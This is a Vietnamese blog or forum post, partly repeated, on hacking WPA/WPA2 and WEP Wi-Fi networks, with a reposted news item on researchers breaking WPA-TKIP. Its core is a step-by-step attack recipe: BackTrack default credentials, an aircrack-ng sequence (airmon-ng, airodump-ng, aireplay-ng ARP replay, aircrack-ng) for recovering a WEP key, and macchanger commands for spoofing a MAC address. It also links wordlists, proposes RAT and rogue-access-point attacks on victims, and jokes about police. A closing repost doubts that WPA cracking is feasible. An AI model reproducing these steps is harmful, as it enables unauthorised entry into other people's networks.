Xin thưa các anh em , hiện tại có 4 cách hack WPA+WPA2 mà dân hacker dang dùng
List of methods:
1. Dictionary attack (sử dụng Dictionary dể tra pass hay còn gọi là sổ số kiến thiết ,hên xui )
2. Bruteforce attack (cách này thì perfect ,pass cỡ nào tra cũng ra => thời gian tìm ra pass thì lâu vô cùng ,tùy vào dộ dài hay dộ khó của pass)
3. RAT+Wirelesskeyview combo attack (cách này thì tựa như là cài Keylogger vào máy victim ,mà con RAT này lợi hại hơn KeyLog ở chỗ là mình có thể điều khiển máy victim => lấy cắp pass rất dễ) . Cách này mà bị police bắt thì truy ra 2 tội (a.dột nhập máy trái phép / b.ăn cắp WIFI trái phép )
4. Rogue AP attack (cách này nghe tụi hacker bảo là khả thi nhất và dễ lấy pass nhất .Nhưng cách này dòi hỏi phải có kiến thức nhiều về mạng ,vì cách thức hoạt dộng là tạo một AP giả mạo ,sau đó Victim kết nối vào và nó require password again ,sau khi victim type vào thì pass sẽ chuyển về cho mình.)
TIN VUI CHO CÁC ANH EM ^^!
Hai nhà khoa học máy tính đến từ trường đại học Toshihiro Ohigashi và Masakatu Morii (Nhật Bản) cho biết, họ có thể bẻ khóa hệ thống mã hóa bảo vệ để truy cập trái phép vào mạng Wi-fi (WPA) trong các bộ định tuyến không dây, và qua trình này chỉ mất có 1 phút.
Thông qua cách làm này, kẻ tấn công có thể đọc lưu lượng được mã hóa gửi đi giữa các máy tính và các bộ định tuyến (router) sử dụng hệ thống mã hóa WPA (truy cập Wi-Fi được bảo vệ). Hai nhà khoa học dự kiến sẽ thảo luận chi tiết hơn về cách thức bẻ khóa này tại hội thảo công nghệ diễn ra vào ngày 25/9 tới tại Hiroshima.
Tháng 11 năm ngoái, các nhà nghiên cứu bảo mật đã trình diễn cách thức bẻ khóa WPA và phải mất từ 12-15 phút. Khi đó, kỹ thuật bẻ khóa được thực hiện trên các hệ thống WPA sử dụng thuật toán Temporal Key Integrity Protocol (TKIP) và không thể áp dụng đối với các thiết bị WPA 2 mới hơn hoặc sử dụng thuật toán mã hóa Advanced Encryption Standard (AES) cấp cao hơn. Còn lần này, các nhà nghiên cứu Nhật Bản đưa ra cách bẻ khóa ở mức mới cao hơn, phạm vi rộng hơn và chỉ mất có 60 giây.
Các bộ định tuyến sử dụng hệ thống bảo mật đã gặp nhiều vấn đề bảo mật trong thời gian qua như hệ thống Wired Equivalent Privacy (WEP) được giới thiệu năm 1997 và bị bẻ khóa chỉ vài năm sau đó. Do đó, lần bẻ khóa này của các chuyên gia bảo mật Nhật Bản đã một lần nữa đánh lên hồi chuông cảnh báo độ bảo mật trên các bộ định tuyến Wi-Fi.
Theo VnMedia (PC World)
"BACKTRACK" CÔNG CỤ HACK WIFI HÀNG ĐẦU THẾ GIỚI
DÙNG CHO MỌI HỆ ĐIỀU HÀNH
bước 1 downnload BACKTRACK 4 beta
KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD
http://www.backtrack-linux.org/downloads/
bước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó
mediafire
CÁI NÀY MÌNH LIỆT KÊ RA CHO NHỮNG BẠN LƯỜI ĐỌC MÀ CHỈ THIX HACK LIỀN List of methods:
1. Dictionary attack (sử dụng Dictionary dể tra pass hay còn gọi là sổ số kiến thiết ,hên xui )
2. Bruteforce attack (cách này thì perfect ,pass cỡ nào tra cũng ra => thời gian tìm ra pass thì lâu vô cùng ,tùy vào dộ dài hay dộ khó của pass)
3. RAT+Wirelesskeyview combo attack (cách này thì tựa như là cài Keylogger vào máy victim ,mà con RAT này lợi hại hơn KeyLog ở chỗ là mình có thể điều khiển máy victim => lấy cắp pass rất dễ) . Cách này mà bị police bắt thì truy ra 2 tội (a.dột nhập máy trái phép / b.ăn cắp WIFI trái phép )
4. Rogue AP attack (cách này nghe tụi hacker bảo là khả thi nhất và dễ lấy pass nhất .Nhưng cách này dòi hỏi phải có kiến thức nhiều về mạng ,vì cách thức hoạt dộng là tạo một AP giả mạo ,sau đó Victim kết nối vào và nó require password again ,sau khi victim type vào thì pass sẽ chuyển về cho mình.)
TIN VUI CHO CÁC ANH EM ^^!
Hai nhà khoa học máy tính đến từ trường đại học Toshihiro Ohigashi và Masakatu Morii (Nhật Bản) cho biết, họ có thể bẻ khóa hệ thống mã hóa bảo vệ để truy cập trái phép vào mạng Wi-fi (WPA) trong các bộ định tuyến không dây, và qua trình này chỉ mất có 1 phút.
Thông qua cách làm này, kẻ tấn công có thể đọc lưu lượng được mã hóa gửi đi giữa các máy tính và các bộ định tuyến (router) sử dụng hệ thống mã hóa WPA (truy cập Wi-Fi được bảo vệ). Hai nhà khoa học dự kiến sẽ thảo luận chi tiết hơn về cách thức bẻ khóa này tại hội thảo công nghệ diễn ra vào ngày 25/9 tới tại Hiroshima.
Tháng 11 năm ngoái, các nhà nghiên cứu bảo mật đã trình diễn cách thức bẻ khóa WPA và phải mất từ 12-15 phút. Khi đó, kỹ thuật bẻ khóa được thực hiện trên các hệ thống WPA sử dụng thuật toán Temporal Key Integrity Protocol (TKIP) và không thể áp dụng đối với các thiết bị WPA 2 mới hơn hoặc sử dụng thuật toán mã hóa Advanced Encryption Standard (AES) cấp cao hơn. Còn lần này, các nhà nghiên cứu Nhật Bản đưa ra cách bẻ khóa ở mức mới cao hơn, phạm vi rộng hơn và chỉ mất có 60 giây.
Các bộ định tuyến sử dụng hệ thống bảo mật đã gặp nhiều vấn đề bảo mật trong thời gian qua như hệ thống Wired Equivalent Privacy (WEP) được giới thiệu năm 1997 và bị bẻ khóa chỉ vài năm sau đó. Do đó, lần bẻ khóa này của các chuyên gia bảo mật Nhật Bản đã một lần nữa đánh lên hồi chuông cảnh báo độ bảo mật trên các bộ định tuyến Wi-Fi.
Theo VnMedia (PC World)
"BACKTRACK" CÔNG CỤ HACK WIFI HÀNG ĐẦU THẾ GIỚI
DÙNG CHO MỌI HỆ ĐIỀU HÀNH
bước 1 downnload BACKTRACK 4 beta
KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD
http://www.backtrack-linux.org/downloads/
bước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó
mediafire
LƯU Ý KHI DÙNG BACKTRACT THEO TÀI LIỆU
1.BT 4 beta
2.để tự động boot không chỉnh bất cứ dòng nào
3.login:root
4.pass:toor
5.mở bảng conshole:có 1 ô màu đen bé xíu kế bên startmenu
CÁC BẠN LÀM THEO DÒNG LỆNH SAU
1.iwconfig-->xem tên card mình đang dùng
mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn
2.airmon-ng
3.airmon-ng stop wlan0
4.airmon-ng start wlan0
5.airodump-ng --ivs --write capturefile wlan0
6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0
7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0
8.aircrack-ng -b {ap bssid}
thế là đã có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)
lượng DATA tối thiểu nên chờ là 40 000 nha các bạn
CHANGE mac NẾU CẦN THIẾT
change mac) thực hiện theo các lệnh sau
-(...) tên interface như WLAN0 chẳng hạn
airmon-ng
airmon-ng stop ...
iconfig ... down
macchanger --mac 00:11:22:33:44:55 ...
airmon-ng start ...
và khi đã monitor , thì bạn tiếp tục thưc hiện các lệnh kế , và bây giờ bạn ko cần quan tâm station cũa người ta (khi đến lệnh nào mầ phải điền station thì bạn điền 00:11 ..etc
have fun
bác nào khi chạy iwconfig ko có thông tin card wifi của mình thì nên vào:
những hardware chạy dc trên BT4
những hardware hông hỗ trợ trên BT4
vô đó search theo loại card mà mình sử dụng, ko cần phải đăng kí để search
ĐÂY LÀ ĐOẠN CLIP MANG TÍNH THAM KHẢO VÀ CÓ THỂ KHÁC TÀI LIỆU (ko đáng kể ^^!)
+nê1u ai ko hiểu bước nào cứ nhắn vào ,mình sẽ chỉ đến khi lấy được key thôi , (và mình sẽ ko chịu trách nhiệm khi các bạn được police mời đi uống trà đá )
1 VÀI DICTIONARY CHO NHỮNG AI HACK WPA & WPA2
Code:
http://websecurity.ro/downloads/dictionary.tar.gz
Code:
http://upload.gibbocool.com/files/28GBwordlist.rar
Code:
http://rapidshare.com/files/98295454/huge_wordlist.rar
lưu ý : các dictionary ở trên khi extract ra sẽ có dung lượng vài chục GB ,nên hãy xem xét trườc khi down
còn đây là trang web chứa dictonary ,ai thĩ thì vào tìm hiểu,có luôn các tool để làm wordlist. Nhưng tạo wordlist thường thường tử 3-8 ký tự alphanumeric không cũng đã vài GB rồi
Code:
http://packetstormsecurity.org/Crackers/wordlists/utilities
THAM KHẢO TẠI : NHỚ THANKS MÌNH NHÁ , ^^!
NOTE---WPA,WPA2
Hi,
Tôi hay lang thang thấy các diễn đàn có nhiều người hỏi về crack passwork wirless để xài chùa, và có rất nhiều bài hướng dẫn làm điều đó, chủ yếu dùng aircrack trên *nix và Abel & Cain trên Windows hoặc BACKTRACK. Bản thân thôi chỉ mới thử dùng aircrack trên Ubuntu để thử dò cái pass của nhà bên cạnh và lên cơ quan dò thử (cả 2 đều dùng WPA). Kết quả đều là con số 0. Sau đó tôi nhận ra rằng để dò được pass thì trong dictionary phải có cái pass đó thì mới có cơ may. Mà ở VN thường có kiểu đặt pass theo kiểu nói trại đi, biến từ biến ngữ, ví dụ như là :
- kute, cut3, kut3 (cute)
- 9girls, nic3girls (nice girls)
- d0g (dog)
- ...
Với kiểu nói và viết như vậy và khi đặt pass cũng đặt như vậy thì tôi dám khẳng định việc crack pass WPA là không thể. Tôi đã từng thử với bộ từ điển search được trên mạng có size là 10 Mb (file text mà 10 Mb thì thử hình dung nó chứa bao nhiêu từ ) mà cũng không dò được pass. Bên cạnh đó với kiểu đặt theo strong password có chữ số, ký tự đặc biệt, vd :
- emkut3@^_^
- |-|3L0 |-|@c|<3r (Hello hacker)
- ..
Thì tôi dám chắc chắn việc crack password WPA là chuyện viễn vông nếu mong muốn ra ngay kết quả ! Hoặc phải có 1 nhóm tập trung các passwork "made in VN" thì mới đáp ứng được.
Vậy các bạn vui lòng cho biết, trong các bạn ai đã từng crack được pass wireless WPA và pass là gì ?
Hy vọng bài viết này sẽ dập tắt được mơ tưởng về việc crack pass wireless WPA của đa số người khi xem các bài tut, các video demo việc crack thấy ngon lành lắm, nhưng không để ý là đã số pass trong các bài tut đó đều rất đơn giản như là 123456, 123456789...
Thân
---------------------------------------------------------------------------------------------
NHỮNG BÀI ĐƯỢC LƯU Ý
hack wpa from namquang ^^! (try it)
0 nhận xét:
Đăng nhận xét